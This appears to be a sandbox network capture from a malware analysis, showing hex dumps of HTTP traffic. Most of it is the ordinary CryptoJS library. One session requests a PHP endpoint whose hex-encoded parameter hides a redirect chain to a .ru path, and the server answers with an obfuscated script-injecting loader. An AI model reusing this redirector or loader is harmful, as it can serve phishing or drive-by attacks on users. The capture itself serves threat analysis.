                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRan
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: _data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: +i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|0,e[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((65535&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61 62 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: |c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l.abs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x,b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: his);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>>32-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC1369INData Raw: 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d 65 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=e(


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2192.168.2.44973869.49.245.1724434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC456OUTGET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yak HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: lipsoftinc.in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC2073INData Raw: 38 30 64 0d 0a 20 20 20 20 76 61 72 20 64 69 44 56 6d 44 54 47 41 42 62 6b 59 53 6f 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 64 69 44 56 6d 44 54 47 41 42 62 6b 59 53 6f 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 64 69 44 56 6d 44 54 47 41 42 62 6b 59 53 6f 76 29 3b 0d 0a 64 69 44 56 6d 44 54 47 41 42 62 6b 59 53 6f 76 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 80d var diDVmDTGABbkYSov = document.createElement("script");diDVmDTGABbkYSov.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(diDVmDTGABbkYSov);diDVmDTGABbkYSov.onload=function()


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3192.168.2.449739104.17.24.144434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Sat, 20 Sep 2025 17:20:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xm5nBn1ayMn%2F%2FaoXd%2FI06Y85h9UzVdXdl4eSyHjzRuDl%2Fpl%2B2uCykVh1WCbGxlLJWSmE2SyxMPEVWqoKGAaUfBhlM5zgMPxKNjq75owElUWc1ePngZdFrpyq7k6yNDlWBbGparYr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e209f95f42c0-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC439INData Raw: 37 62 66 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 7bfd!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: d"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 2c 63 29 2c
